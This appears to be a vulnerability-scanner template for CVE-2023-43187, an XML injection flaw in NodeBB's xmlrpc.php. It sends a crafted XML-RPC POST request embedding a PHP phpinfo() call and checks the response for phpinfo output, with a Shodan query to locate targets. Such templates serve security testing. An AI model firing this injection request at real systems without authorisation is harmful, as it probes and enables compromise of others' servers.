56 lines
1.3 KiB
YAML
56 lines
1.3 KiB
YAML
|
id: CVE-2023-43187
|
||
|
|
||
|
info:
|
||
|
name: NodeBB XML-RPC Request xmlrpc.php - XML Injection
|
||
|
author: 0xParth
|
||
|
severity: critical
|
||
|
description: |
|
||
|
A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.
|
||
|
reference:
|
||
|
-
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 9.8
|
||
|
cve-id: CVE-2023-43187
|
||
|
cwe-id: CWE-91
|
||
|
epss-score: 0.00326
|
||
|
epss-percentile: 0.70173
|
||
|
cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:*
|
||
|
metadata:
|
||
|
vendor: nodebb
|
||
|
product: nodebb
|
||
|
shodan-query: title:"nodebb"
|
||
|
tags: cve,cve2023,nodebb,rce
|
||
|
|
||
|
http:
|
||
|
- method: POST
|
||
|
path:
|
||
|
- "{{BaseURL}}/xmlrpc.php"
|
||
|
|
||
|
headers:
|
||
|
Content-Type: "text/xml"
|
||
|
|
||
|
body: |
|
||
|
<?xml version="1.0"?>
|
||
|
<methodCall>
|
||
|
<methodName>system.listMethods</methodName>
|
||
|
<params>
|
||
|
<param>
|
||
|
<value><?php phpinfo(); ?></value>
|
||
|
</param>
|
||
|
</params>
|
||
|
</methodCall>
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "<title>phpinfo()</title>"
|
||
|
- "PHP Version"
|
||
|
condition: or
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|